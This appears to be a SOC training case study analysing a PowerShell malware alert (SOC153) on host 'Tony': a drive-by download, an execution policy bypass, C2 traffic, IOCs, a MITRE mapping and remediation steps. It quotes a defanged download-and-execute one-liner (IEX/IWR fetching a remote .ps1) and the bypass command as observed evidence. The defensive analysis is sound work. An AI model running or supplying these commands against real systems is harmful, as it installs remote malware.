SOC153 Case Study: Malicious PowerShell Execution Leading to Active Malware Infection
Event ID: 238
Rule Name: SOC153 – Suspicious PowerShell Script Executed
Severity: HIGH
Category: Endpoint Compromise / Malware
Event Time: March 14, 2024 – 05:23 PM
Compromised Host: Tony (172.16.17.206)
Tony at work opened a suspicious file they probably shouldn’t have. It was like finding a strange USB drive in the parking lot and plugging it into your computer you don’t know what’s on it, but it starts doing things automatically.It ran some code that gave access to the malicious actors who have now taken over the system in this scenario.
Incident Analysis Summary
| Field | Analysis |
|---|---|
| Alert Name | SOC153 - Suspicious Powershell Script Executed |
| Severity | High (Potential Malware Execution) |
| Event ID | 238 |
| Event Time | Mar 14, 2024, 05:23 PM |
| Compromised Host | Tony (172.16.17.206) |
1. Alert Overview
The alert was triggered due to the execution of a suspicious PowerShell script (payload_1.ps1) on an endpoint. The detection indicated potential malware or unwanted software execution using PowerShell with execution policy bypass techniques.
Initial triage required verification of logs to determine whether the activity represented a false positive or a successful attack.
2. Detection & Verification
Log analysis was conducted in Log Management by searching for the affected host IP:
Client IP: 172.16.17.206
The following log sources were reviewed:
- Firewall logs
- DNS logs
- Proxy logs
- Endpoint / OS logs PowerShell operational logs confirmed execution of:
payload_1.ps1- Execution time: 05:23 PM The script execution was observed under **PowerShell Event ID 4104, confirming script block logging. Based on this evidence, the alert was verified as a True Positive.
3. Incident Analysis
Initial Access – Drive-by Compromise
A search for payload_1.ps1 revealed the following download source in proxy logs:
hxxps://files-ld.s3.us-east-2.amazonaws.com/payload_1.ps1
- Proxy action: Allowed
- No associated phishing email found in Email Security logs Conclusion: Initial access occurred via Drive-by Compromise, where the user downloaded and executed a malicious script from the web rather than through email.
Malware Execution
The malicious PowerShell script was executed from the user’s
Downloads directory and bypassed execution policy restrictions using the following command:
Set-ExecutionPolicy -Scope Process Bypass
Observed execution command:
powershell.exe -Command IEX(IWR -UseBasicParsing 'hxxps://kionagranada.com/upload/sd2.ps1')
This confirms:
- User execution
- PowerShell abuse
- Execution policy bypass
Command & Control (C2) Activity
Threat intelligence and log analysis identified outbound communication to:
kionagranada[.]com
Resolved IP:
161[.]22[.]46[.]148
- AV/EDR detected the malicious activity
- Malware NOT quarantined/cleaned (active on system)
- Execution observed in process logs Firewall logs confirmed successful outbound connections, validating active Command & Control communication.
4. Reputation & Threat Intelligence
The SHA-256 hash of payload_1.ps1 was analyzed using VirusTotal:
VirusTotal Findings
- 46 / 71 vendors flagged the file as malicious
- Classified as Trojan / PowerShell Downloader
- Associated with additional payload delivery
- Network indicators linked to known malicious infrastructure
Notable PowerShell Cmdlets Observed
Invoke-WebRequest (IWR)– Remote payload retrievalInvoke-Expression (IEX)– In-memory executionNew-Object– Object instantiationWhere-Object– Data filteringWrite-Output– Script output handling
5. Indicators of Compromise (IOCs)
| Category | Value |
|---|---|
| File Name | payload_1.ps1 |
| SHA-256 | db8be06ba6d2d3595dd0c86654a48cfc4c0c5408fdd3f4e1eaf342ac7a2479d0 |
| C2 Domain | kionagranada.com |
| C2 IPs | 161[.]22.46.148, 91[.]236.116.163 |
| Malicious URLs | hxxps://kionagranada.com/upload/sd2.ps1 |
| Host IP | 172[.]16.17.206 |
6. MITRE ATT&CK Mapping
| Tactic | Technique | ID |
|---|---|---|
| Initial Access | Drive-by Compromise | T1189 |
| Execution | PowerShell | T1059.001 |
| Execution | User Execution | T1204 |
| Defense Evasion | Execution Policy Bypass | T1562 |
| Command & Control | Web Protocols | T1071.001 |
| Command & Control | Ingress Tool Transfer | T1105 |
7. Sigma Rule and Yara Rule
Immediate Actions Taken
- Containment: Endpoint containment initiated via EDR
- C2 Confirmation: Verified C2 communication occurred
- Threat Indicator: Marked as malicious infrastructure
Recommended Next Steps
Short-term (Remediation):
- Isolate host “Tony” from network
- Perform full malware scan/removal
- Reset credentials for affected user account
- Block C2 domains at firewall/proxy level
Medium-term (Prevention):
- Implement PowerShell logging (Module/Transcript)
- Restrict PowerShell execution policies
- Enhance endpoint detection rules for IEX/IWR patterns
- User awareness training on suspicious downloads
Long-term (Hardening):
- Application whitelisting for PowerShell
- Implement AMSI (Anti-Malware Scan Interface)
- Regular security baseline reviews
Final Assessment
True Positive - Active Malware Infection
The incident represents a successful malware execution with confirmed C2 communication. The attacker achieved initial access through user execution of a malicious PowerShell script, bypassed security controls, and established remote command capabilities.
Risk Level: CRITICAL
- Data exfiltration possible
- Lateral movement potential
- Persistence mechanisms likely installed
Lessons Learned
- User awareness training is critical to prevent execution of unknown scripts
- PowerShell execution policies alone are insufficient
- Script block logging (Event ID 4104) is essential for detection
- Web-based payload delivery must be monitored and restricted
- EDR solutions must actively block, not just alert